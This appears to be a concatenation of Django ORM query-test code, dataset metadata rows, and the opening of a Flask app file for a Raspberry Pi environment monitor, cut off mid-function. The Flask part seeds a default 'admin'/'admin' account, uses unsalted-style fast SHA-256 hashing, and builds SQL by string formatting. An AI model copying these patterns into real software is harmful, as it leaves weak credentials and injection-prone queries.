i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
i3 = Identifier.objects.create(name='i3')
Program.objects.create(identifier=i1)
Channel.objects.create(identifier=i1)
Program.objects.create(identifier=i2)
self.assertSequenceEqual(Identifier.objects.filter(program=None, channel=None), [i3])
self.assertSequenceEqual(Identifier.objects.exclude(program=None, channel=None).order_by('name'), [i1, i2])
def test_ticket_21748_double_negated_and(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
Identifier.objects.create(name='i3')
p1 = Program.objects.create(identifier=i1)
c1 = Channel.objects.create(identifier=i1)
Program.objects.create(identifier=i2)
# Check the ~~Q() (or equivalently .exclude(~Q)) works like Q() for
# join promotion.
qs1_doubleneg = Identifier.objects.exclude(~Q(program__id=p1.id, channel__id=c1.id)).order_by('pk')
qs1_filter = Identifier.objects.filter(program__id=p1.id, channel__id=c1.id).order_by('pk')
self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
self.assertEqual(str(qs1_filter.query).count('JOIN'),
str(qs1_doubleneg.query).count('JOIN'))
self.assertEqual(2, str(qs1_doubleneg.query).count('INNER JOIN'))
self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
str(qs1_doubleneg.query).count('INNER JOIN'))
def test_ticket_21748_double_negated_or(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
Identifier.objects.create(name='i3')
p1 = Program.objects.create(identifier=i1)
c1 = Channel.objects.create(identifier=i1)
p2 = Program.objects.create(identifier=i2)
# Test OR + doubleneg. The expected result is that channel is LOUTER
# joined, program INNER joined
qs1_filter = Identifier.objects.filter(
Q(program__id=p2.id, channel__id=c1.id) | Q(program__id=p1.id)
).order_by('pk')
qs1_doubleneg = Identifier.objects.exclude(
~Q(Q(program__id=p2.id, channel__id=c1.id) | Q(program__id=p1.id))
).order_by('pk')
self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
self.assertEqual(str(qs1_filter.query).count('JOIN'),
str(qs1_doubleneg.query).count('JOIN'))
self.assertEqual(1, str(qs1_doubleneg.query).count('INNER JOIN'))
self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
str(qs1_doubleneg.query).count('INNER JOIN'))
def test_ticket_21748_complex_filter(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
Identifier.objects.create(name='i3')
p1 = Program.objects.create(identifier=i1)
c1 = Channel.objects.create(identifier=i1)
p2 = Program.objects.create(identifier=i2)
# Finally, a more complex case, one time in a way where each
# NOT is pushed to lowest level in the boolean tree, and
# another query where this isn't done.
qs1 = Identifier.objects.filter(
~Q(~Q(program__id=p2.id, channel__id=c1.id) & Q(program__id=p1.id))
).order_by('pk')
qs2 = Identifier.objects.filter(
Q(Q(program__id=p2.id, channel__id=c1.id) | ~Q(program__id=p1.id))
).order_by('pk')
self.assertQuerysetEqual(qs1, qs2, lambda x: x)
self.assertEqual(str(qs1.query).count('JOIN'),
str(qs2.query).count('JOIN'))
self.assertEqual(0, str(qs1.query).count('INNER JOIN'))
self.assertEqual(str(qs1.query).count('INNER JOIN'),
str(qs2.query).count('INNER JOIN'))
class ReverseJoinTrimmingTest(TestCase):
def test_reverse_trimming(self):
# We don't accidentally trim reverse joins - we can't know if there is
# anything on the other side of the join, so trimming reverse joins
# can't be done, ever.
t = Tag.objects.create()
qs = Tag.objects.filter(annotation__tag=t.pk)
self.assertIn('INNER JOIN', str(qs.query))
self.assertEqual(list(qs), [])
class JoinReuseTest(TestCase):
"""
The queries reuse joins sensibly (for example, direct joins
are always reused).
"""
def test_fk_reuse(self):
qs = Annotation.objects.filter(tag__name='foo').filter(tag__name='bar')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_select_related(self):
qs = Annotation.objects.filter(tag__name='foo').select_related('tag')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_annotation(self):
qs = Annotation.objects.filter(tag__name='foo').annotate(cnt=Count('tag__name'))
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_disjunction(self):
qs = Annotation.objects.filter(Q(tag__name='foo') | Q(tag__name='bar'))
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_order_by(self):
qs = Annotation.objects.filter(tag__name='foo').order_by('tag__name')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_revo2o_reuse(self):
qs = Detail.objects.filter(member__name='foo').filter(member__name='foo')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_revfk_noreuse(self):
qs = Author.objects.filter(report__name='r4').filter(report__name='r1')
self.assertEqual(str(qs.query).count('JOIN'), 2)
def test_inverted_q_across_relations(self):
"""
When a trimmable join is specified in the query (here school__), the
ORM detects it and removes unnecessary joins. The set of reusable joins
are updated after trimming the query so that other lookups don't
consider that the outer query's filters are in effect for the subquery
(#26551).
"""
springfield_elementary = School.objects.create()
hogward = School.objects.create()
Student.objects.create(school=springfield_elementary)
hp = Student.objects.create(school=hogward)
Classroom.objects.create(school=hogward, name='Potion')
Classroom.objects.create(school=springfield_elementary, name='Main')
qs = Student.objects.filter(
~(Q(school__classroom__name='Main') & Q(school__classroom__has_blackboard=None))
)
self.assertSequenceEqual(qs, [hp])
class DisjunctionPromotionTests(TestCase):
def test_disjunction_promotion_select_related(self):
fk1 = FK1.objects.create(f1='f1', f2='f2')
basea = BaseA.objects.create(a=fk1)
qs = BaseA.objects.filter(Q(a=fk1) | Q(b=2))
self.assertEqual(str(qs.query).count(' JOIN '), 0)
qs = qs.select_related('a', 'b')
self.assertEqual(str(qs.query).count(' INNER JOIN '), 0)
self.assertEqual(str(qs.query).count(' LEFT OUTER JOIN '), 2)
with self.assertNumQueries(1):
self.assertSequenceEqual(qs, [basea])
self.assertEqual(qs[0].a, fk1)
self.assertIs(qs[0].b, None)
def test_disjunction_promotion1(self):
# Pre-existing join, add two ORed filters to the same join,
# all joins can be INNER JOINS.
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(Q(b__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
# Reverse the order of AND and OR filters.
qs = BaseA.objects.filter(Q(b__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
def test_disjunction_promotion2(self):
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# Now we have two different joins in an ORed condition, these
# must be OUTER joins. The pre-existing join should remain INNER.
qs = qs.filter(Q(b__f1='foo') | Q(c__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
# Reverse case.
qs = BaseA.objects.filter(Q(b__f1='foo') | Q(c__f2='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
def test_disjunction_promotion3(self):
qs = BaseA.objects.filter(a__f2='bar')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# The ANDed a__f2 filter allows us to use keep using INNER JOIN
# even inside the ORed case. If the join to a__ returns nothing,
# the ANDed filter for a__f2 can't be true.
qs = qs.filter(Q(a__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion3_demote(self):
# This one needs demotion logic: the first filter causes a to be
# outer joined, the second filter makes it inner join again.
qs = BaseA.objects.filter(
Q(a__f1='foo') | Q(b__f2='foo')).filter(a__f2='bar')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion4_demote(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
# Demote needed for the "a" join. It is marked as outer join by
# above filter (even if it is trimmed away).
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion4(self):
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion5_demote(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
# Note that the above filters on a force the join to an
# inner join even if it is trimmed.
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = qs.filter(Q(a__f1='foo') | Q(b__f1='foo'))
# So, now the a__f1 join doesn't need promotion.
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# But b__f1 does.
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
qs = BaseA.objects.filter(Q(a__f1='foo') | Q(b__f1='foo'))
# Now the join to a is created as LOUTER
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion6(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
def test_disjunction_promotion7(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') | (Q(b__f1='foo') & Q(a__f1='bar')))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
qs = BaseA.objects.filter(
(Q(a__f1='foo') | Q(b__f1='foo')) & (Q(a__f1='bar') | Q(c__f1='foo'))
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
qs = BaseA.objects.filter(
Q(a__f1='foo') | Q(a__f1='bar') & (Q(b__f1='bar') | Q(c__f1='foo'))
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion_fexpression(self):
qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(a__f2=F('b__f2')) | Q(c__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | (Q(pk=1) & Q(pk=2)))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
class ManyToManyExcludeTest(TestCase):
def test_exclude_many_to_many(self):
i_extra = Identifier.objects.create(name='extra')
i_program = Identifier.objects.create(name='program')
program = Program.objects.create(identifier=i_program)
i_channel = Identifier.objects.create(name='channel')
channel = Channel.objects.create(identifier=i_channel)
channel.programs.add(program)
# channel contains 'program1', so all Identifiers except that one
# should be returned
self.assertSequenceEqual(
Identifier.objects.exclude(program__channel=channel).order_by('name'),
[i_channel, i_extra],
)
self.assertSequenceEqual(
Identifier.objects.exclude(program__channel=None).order_by('name'),
[i_program],
)
def test_ticket_12823(self):
pg3 = Page.objects.create(text='pg3')
pg2 = Page.objects.create(text='pg2')
pg1 = Page.objects.create(text='pg1')
pa1 = Paragraph.objects.create(text='pa1')
pa1.page.set([pg1, pg2])
pa2 = Paragraph.objects.create(text='pa2')
pa2.page.set([pg2, pg3])
pa3 = Paragraph.objects.create(text='pa3')
ch1 = Chapter.objects.create(title='ch1', paragraph=pa1)
ch2 = Chapter.objects.create(title='ch2', paragraph=pa2)
ch3 = Chapter.objects.create(title='ch3', paragraph=pa3)
b1 = Book.objects.create(title='b1', chapter=ch1)
b2 = Book.objects.create(title='b2', chapter=ch2)
b3 = Book.objects.create(title='b3', chapter=ch3)
q = Book.objects.exclude(chapter__paragraph__page__text='pg1')
self.assertNotIn('IS NOT NULL', str(q.query))
self.assertEqual(len(q), 2)
self.assertNotIn(b1, q)
self.assertIn(b2, q)
self.assertIn(b3, q)
class RelabelCloneTest(TestCase):
def test_ticket_19964(self):
my1 = MyObject.objects.create(data='foo')
my1.parent = my1
my1.save()
my2 = MyObject.objects.create(data='bar', parent=my1)
parents = MyObject.objects.filter(parent=F('id'))
children = MyObject.objects.filter(parent__in=parents).exclude(parent=F('id'))
self.assertEqual(list(parents), [my1])
# Evaluating the children query (which has parents as part of it) does
# not change results for the parents query.
self.assertEqual(list(children), [my2])
self.assertEqual(list(parents), [my1])
class Ticket20101Tests(TestCase):
def test_ticket_20101(self):
"""
Tests QuerySet ORed combining in exclude subquery case.
"""
t = Tag.objects.create(name='foo')
a1 = Annotation.objects.create(tag=t, name='a1')
a2 = Annotation.objects.create(tag=t, name='a2')
a3 = Annotation.objects.create(tag=t, name='a3')
n = Note.objects.create(note='foo', misc='bar')
qs1 = Note.objects.exclude(annotation__in=[a1, a2])
qs2 = Note.objects.filter(annotation__in=[a3])
self.assertIn(n, qs1)
self.assertNotIn(n, qs2)
self.assertIn(n, (qs1 | qs2))
class EmptyStringPromotionTests(SimpleTestCase):
def test_empty_string_promotion(self):
qs = RelatedObject.objects.filter(single__name='')
if connection.features.interprets_empty_strings_as_nulls:
self.assertIn('LEFT OUTER JOIN', str(qs.query))
else:
self.assertNotIn('LEFT OUTER JOIN', str(qs.query))
class ValuesSubqueryTests(TestCase):
def test_values_in_subquery(self):
# If a values() queryset is used, then the given values
# will be used instead of forcing use of the relation's field.
o1 = Order.objects.create(id=-2)
o2 = Order.objects.create(id=-1)
oi1 = OrderItem.objects.create(order=o1, status=0)
oi1.status = oi1.pk
oi1.save()
OrderItem.objects.create(order=o2, status=0)
# The query below should match o1 as it has related order_item
# with id == status.
self.assertSequenceEqual(Order.objects.filter(items__in=OrderItem.objects.values_list('status')), [o1])
class DoubleInSubqueryTests(TestCase):
def test_double_subquery_in(self):
lfa1 = LeafA.objects.create(data='foo')
lfa2 = LeafA.objects.create(data='bar')
lfb1 = LeafB.objects.create(data='lfb1')
lfb2 = LeafB.objects.create(data='lfb2')
Join.objects.create(a=lfa1, b=lfb1)
Join.objects.create(a=lfa2, b=lfb2)
leaf_as = LeafA.objects.filter(data='foo').values_list('pk', flat=True)
joins = Join.objects.filter(a__in=leaf_as).values_list('b__id', flat=True)
qs = LeafB.objects.filter(pk__in=joins)
self.assertSequenceEqual(qs, [lfb1])
class Ticket18785Tests(SimpleTestCase):
def test_ticket_18785(self):
# Test join trimming from ticket18785
qs = Item.objects.exclude(
note__isnull=False
).filter(
name='something', creator__extra__isnull=True
).order_by()
self.assertEqual(1, str(qs.query).count('INNER JOIN'))
self.assertEqual(0, str(qs.query).count('OUTER JOIN'))
class Ticket20788Tests(TestCase):
def test_ticket_20788(self):
Paragraph.objects.create()
paragraph = Paragraph.objects.create()
page = paragraph.page.create()
chapter = Chapter.objects.create(paragraph=paragraph)
Book.objects.create(chapter=chapter)
paragraph2 = Paragraph.objects.create()
Page.objects.create()
chapter2 = Chapter.objects.create(paragraph=paragraph2)
book2 = Book.objects.create(chapter=chapter2)
sentences_not_in_pub = Book.objects.exclude(chapter__paragraph__page=page)
self.assertSequenceEqual(sentences_not_in_pub, [book2])
class Ticket12807Tests(TestCase):
def test_ticket_12807(self):
p1 = Paragraph.objects.create()
p2 = Paragraph.objects.create()
# The ORed condition below should have no effect on the query - the
# ~Q(pk__in=[]) will always be True.
qs = Paragraph.objects.filter((Q(pk=p2.pk) | ~Q(pk__in=[])) & Q(pk=p1.pk))
self.assertSequenceEqual(qs, [p1])
class RelatedLookupTypeTests(TestCase):
error = 'Cannot query "%s": Must be "%s" instance.'
@classmethod
def setUpTestData(cls):
cls.oa = ObjectA.objects.create(name="oa")
cls.poa = ProxyObjectA.objects.get(name="oa")
cls.coa = ChildObjectA.objects.create(name="coa")
cls.wrong_type = Order.objects.create(id=cls.oa.pk)
cls.ob = ObjectB.objects.create(name="ob", objecta=cls.oa, num=1)
cls.pob1 = ProxyObjectB.objects.create(name="pob", objecta=cls.oa, num=2)
cls.pob = ProxyObjectB.objects.all()
cls.c = ObjectC.objects.create(childobjecta=cls.coa)
def test_wrong_type_lookup(self):
"""
A ValueError is raised when the incorrect object type is passed to a
query lookup.
"""
# Passing incorrect object type
with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectA._meta.object_name)):
ObjectB.objects.get(objecta=self.wrong_type)
with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectA._meta.object_name)):
ObjectB.objects.filter(objecta__in=[self.wrong_type])
with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectA._meta.object_name)):
ObjectB.objects.filter(objecta=self.wrong_type)
with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectB._meta.object_name)):
ObjectA.objects.filter(objectb__in=[self.wrong_type, self.ob])
# Passing an object of the class on which query is done.
with self.assertRaisesMessage(ValueError, self.error % (self.ob, ObjectA._meta.object_name)):
ObjectB.objects.filter(objecta__in=[self.poa, self.ob])
with self.assertRaisesMessage(ValueError, self.error % (self.ob, ChildObjectA._meta.object_name)):
ObjectC.objects.exclude(childobjecta__in=[self.coa, self.ob])
def test_wrong_backward_lookup(self):
"""
A ValueError is raised when the incorrect object type is passed to a
query lookup for backward relations.
"""
with self.assertRaisesMessage(ValueError, self.error % (self.oa, ObjectB._meta.object_name)):
ObjectA.objects.filter(objectb__in=[self.oa, self.ob])
with self.assertRaisesMessage(ValueError, self.error % (self.oa, ObjectB._meta.object_name)):
ObjectA.objects.exclude(objectb=self.oa)
with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectB._meta.object_name)):
ObjectA.objects.get(objectb=self.wrong_type)
def test_correct_lookup(self):
"""
When passing proxy model objects, child objects, or parent objects,
lookups work fine.
"""
out_a = [self.oa]
out_b = [self.ob, self.pob1]
out_c = [self.c]
# proxy model objects
self.assertSequenceEqual(ObjectB.objects.filter(objecta=self.poa).order_by('name'), out_b)
self.assertSequenceEqual(ObjectA.objects.filter(objectb__in=self.pob).order_by('pk'), out_a * 2)
# child objects
self.assertSequenceEqual(ObjectB.objects.filter(objecta__in=[self.coa]), [])
self.assertSequenceEqual(ObjectB.objects.filter(objecta__in=[self.poa, self.coa]).order_by('name'), out_b)
self.assertSequenceEqual(
ObjectB.objects.filter(objecta__in=iter([self.poa, self.coa])).order_by('name'),
out_b
)
# parent objects
self.assertSequenceEqual(ObjectC.objects.exclude(childobjecta=self.oa), out_c)
# QuerySet related object type checking shouldn't issue queries
# (the querysets aren't evaluated here, hence zero queries) (#23266).
with self.assertNumQueries(0):
ObjectB.objects.filter(objecta__in=ObjectA.objects.all())
def test_values_queryset_lookup(self):
"""
#23396 - Ensure ValueQuerySets are not checked for compatibility with the lookup field
"""
# Make sure the num and objecta field values match.
ob = ObjectB.objects.get(name='ob')
ob.num = ob.objecta.pk
ob.save()
pob = ObjectB.objects.get(name='pob')
pob.num = pob.objecta.pk
pob.save()
self.assertSequenceEqual(ObjectB.objects.filter(
objecta__in=ObjectB.objects.all().values_list('num')
).order_by('pk'), [ob, pob])
class Ticket14056Tests(TestCase):
def test_ticket_14056(self):
s1 = SharedConnection.objects.create(data='s1')
s2 = SharedConnection.objects.create(data='s2')
s3 = SharedConnection.objects.create(data='s3')
PointerA.objects.create(connection=s2)
expected_ordering = (
[s1, s3, s2] if connection.features.nulls_order_largest
else [s2, s1, s3]
)
self.assertSequenceEqual(SharedConnection.objects.order_by('-pointera__connection', 'pk'), expected_ordering)
class Ticket20955Tests(TestCase):
def test_ticket_20955(self):
jack = Staff.objects.create(name='jackstaff')
jackstaff = StaffUser.objects.create(staff=jack)
jill = Staff.objects.create(name='jillstaff')
jillstaff = StaffUser.objects.create(staff=jill)
task = Task.objects.create(creator=jackstaff, owner=jillstaff, title="task")
task_get = Task.objects.get(pk=task.pk)
# Load data so that assertNumQueries doesn't complain about the get
# version's queries.
task_get.creator.staffuser.staff
task_get.owner.staffuser.staff
qs = Task.objects.select_related(
'creator__staffuser__staff', 'owner__staffuser__staff')
self.assertEqual(str(qs.query).count(' JOIN '), 6)
task_select_related = qs.get(pk=task.pk)
with self.assertNumQueries(0):
self.assertEqual(task_select_related.creator.staffuser.staff,
task_get.creator.staffuser.staff)
self.assertEqual(task_select_related.owner.staffuser.staff,
task_get.owner.staffuser.staff)
class Ticket21203Tests(TestCase):
def test_ticket_21203(self):
p = Ticket21203Parent.objects.create(parent_bool=True)
c = Ticket21203Child.objects.create(parent=p)
qs = Ticket21203Child.objects.select_related('parent').defer('parent__created')
self.assertSequenceEqual(qs, [c])
self.assertIs(qs[0].parent.parent_bool, True)
class ValuesJoinPromotionTests(TestCase):
def test_values_no_promotion_for_existing(self):
qs = Node.objects.filter(parent__parent__isnull=False)
self.assertIn(' INNER JOIN ', str(qs.query))
qs = qs.values('parent__parent__id')
self.assertIn(' INNER JOIN ', str(qs.query))
# Make sure there is a left outer join without the filter.
qs = Node.objects.values('parent__parent__id')
self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
def test_non_nullable_fk_not_promoted(self):
qs = ObjectB.objects.values('objecta__name')
self.assertIn(' INNER JOIN ', str(qs.query))
def test_ticket_21376(self):
a = ObjectA.objects.create()
ObjectC.objects.create(objecta=a)
qs = ObjectC.objects.filter(
Q(objecta=a) | Q(objectb__objecta=a),
)
qs = qs.filter(
Q(objectb=1) | Q(objecta=a),
)
self.assertEqual(qs.count(), 1)
tblname = connection.ops.quote_name(ObjectB._meta.db_table)
self.assertIn(' LEFT OUTER JOIN %s' % tblname, str(qs.query))
class ForeignKeyToBaseExcludeTests(TestCase):
def test_ticket_21787(self):
sc1 = SpecialCategory.objects.create(special_name='sc1', name='sc1')
sc2 = SpecialCategory.objects.create(special_name='sc2', name='sc2')
sc3 = SpecialCategory.objects.create(special_name='sc3', name='sc3')
c1 = CategoryItem.objects.create(category=sc1)
CategoryItem.objects.create(category=sc2)
self.assertSequenceEqual(SpecialCategory.objects.exclude(categoryitem__id=c1.pk).order_by('name'), [sc2, sc3])
self.assertSequenceEqual(SpecialCategory.objects.filter(categoryitem__id=c1.pk), [sc1])
class ReverseM2MCustomPkTests(TestCase):
def test_ticket_21879(self):
cpt1 = CustomPkTag.objects.create(id='cpt1', tag='cpt1')
cp1 = CustomPk.objects.create(name='cp1', extra='extra')
cp1.custompktag_set.add(cpt1)
self.assertSequenceEqual(CustomPk.objects.filter(custompktag=cpt1), [cp1])
self.assertSequenceEqual(CustomPkTag.objects.filter(custom_pk=cp1), [cpt1])
class Ticket22429Tests(TestCase):
def test_ticket_22429(self):
sc1 = School.objects.create()
st1 = Student.objects.create(school=sc1)
sc2 = School.objects.create()
st2 = Student.objects.create(school=sc2)
cr = Classroom.objects.create(school=sc1)
cr.students.add(st1)
queryset = Student.objects.filter(~Q(classroom__school=F('school')))
self.assertSequenceEqual(queryset, [st2])
class Ticket23605Tests(TestCase):
def test_ticket_23605(self):
# Test filtering on a complicated q-object from ticket's report.
# The query structure is such that we have multiple nested subqueries.
# The original problem was that the inner queries weren't relabeled
# correctly.
# See also #24090.
a1 = Ticket23605A.objects.create()
a2 = Ticket23605A.objects.create()
c1 = Ticket23605C.objects.create(field_c0=10000.0)
Ticket23605B.objects.create(
field_b0=10000.0, field_b1=True,
modelc_fk=c1, modela_fk=a1)
complex_q = Q(pk__in=Ticket23605A.objects.filter(
Q(
# True for a1 as field_b0 = 10000, field_c0=10000
# False for a2 as no ticket23605b found
ticket23605b__field_b0__gte=1000000 /
F("ticket23605b__modelc_fk__field_c0")
) &
# True for a1 (field_b1=True)
Q(ticket23605b__field_b1=True) & ~Q(ticket23605b__pk__in=Ticket23605B.objects.filter(
~(
# Same filters as above commented filters, but
# double-negated (one for Q() above, one for
# parentheses). So, again a1 match, a2 not.
Q(field_b1=True) &
Q(field_b0__gte=1000000 / F("modelc_fk__field_c0"))
)
))).filter(ticket23605b__field_b1=True))
qs1 = Ticket23605A.objects.filter(complex_q)
self.assertSequenceEqual(qs1, [a1])
qs2 = Ticket23605A.objects.exclude(complex_q)
self.assertSequenceEqual(qs2, [a2])
class TestTicket24279(TestCase):
def test_ticket_24278(self):
School.objects.create()
qs = School.objects.filter(Q(pk__in=()) | Q())
self.assertQuerysetEqual(qs, [])
class TestInvalidValuesRelation(SimpleTestCase):
def test_invalid_values(self):
msg = "Field 'id' expected a number but got 'abc'."
with self.assertRaisesMessage(ValueError, msg):
Annotation.objects.filter(tag='abc')
with self.assertRaisesMessage(ValueError, msg):
Annotation.objects.filter(tag__in=[123, 'abc'])
class TestTicket24605(TestCase):
def test_ticket_24605(self):
"""
Subquery table names should be quoted.
"""
i1 = Individual.objects.create(alive=True)
RelatedIndividual.objects.create(related=i1)
i2 = Individual.objects.create(alive=False)
RelatedIndividual.objects.create(related=i2)
i3 = Individual.objects.create(alive=True)
i4 = Individual.objects.create(alive=False)
self.assertSequenceEqual(Individual.objects.filter(Q(alive=False), Q(related_individual__isnull=True)), [i4])
self.assertSequenceEqual(
Individual.objects.exclude(Q(alive=False), Q(related_individual__isnull=True)).order_by('pk'),
[i1, i2, i3]
)
class Ticket23622Tests(TestCase):
@skipUnlessDBFeature('can_distinct_on_fields')
def test_ticket_23622(self):
"""
Make sure __pk__in and __in work the same for related fields when
using a distinct on subquery.
"""
a1 = Ticket23605A.objects.create()
a2 = Ticket23605A.objects.create()
c1 = Ticket23605C.objects.create(field_c0=0.0)
Ticket23605B.objects.create(
modela_fk=a1, field_b0=123,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a1, field_b0=23,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a1, field_b0=234,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a1, field_b0=12,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a2, field_b0=567,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a2, field_b0=76,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a2, field_b0=7,
field_b1=True,
modelc_fk=c1,
)
Ticket23605B.objects.create(
modela_fk=a2, field_b0=56,
field_b1=True,
modelc_fk=c1,
)
qx = (
Q(ticket23605b__pk__in=Ticket23605B.objects.order_by('modela_fk', '-field_b1').distinct('modela_fk')) &
Q(ticket23605b__field_b0__gte=300)
)
qy = (
Q(ticket23605b__in=Ticket23605B.objects.order_by('modela_fk', '-field_b1').distinct('modela_fk')) &
Q(ticket23605b__field_b0__gte=300)
)
self.assertEqual(
set(Ticket23605A.objects.filter(qx).values_list('pk', flat=True)),
set(Ticket23605A.objects.filter(qy).values_list('pk', flat=True))
)
self.assertSequenceEqual(Ticket23605A.objects.filter(qx), [a2])
| 42.112306 | 119 | 0.631153 |
6b4cf1fe4a7ecfa0f2937c7b72372bf7fdab0558 | 2,415 | py | Python | webserver/__init__.py | danshardware/pi-env-monitor | f16d5109e105b887e86beb37eca45cadd2021aa4 | [
"MIT"
] | null | null | null | webserver/__init__.py | danshardware/pi-env-monitor | f16d5109e105b887e86beb37eca45cadd2021aa4 | [
"MIT"
] | null | null | null | webserver/__init__.py | danshardware/pi-env-monitor | f16d5109e105b887e86beb37eca45cadd2021aa4 | [
"MIT"
] | null | null | null | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from sqlalchemy.exc import OperationalError
import os, secrets, sys
from hashlib import sha256
# init SQLAlchemy so we can use it later in our models
db = SQLAlchemy()
def create_secret(logger):
secret = secrets.token_hex(32)
logger.warn("No secret provided in the SECRET_KEY environment variable. Using %s for this session", secret)
return secret
# checkes if the DB is seeded and seeds if it's not
def seed_db(db, logger):
logger.warn("Database is being initialized")
try:
with db.engine.connect() as con:
salt = secrets.token_hex(16)
passwordHash = sha256('{}:{}'.format(salt, "admin").encode('utf-8')).hexdigest()
con.execute("INSERT into users (id, username, salt, password, data) VALUES (0, 'admin', '{}', '{}', '')".format(salt, passwordHash))
except OperationalError as e:
logger.warn("Failed to add admin user: %2", e.detail)
return False
else:
return True
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = os.getenv('SECRET_KEY') or create_secret(app.logger)
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:////var/pi-env/db.sqlite')
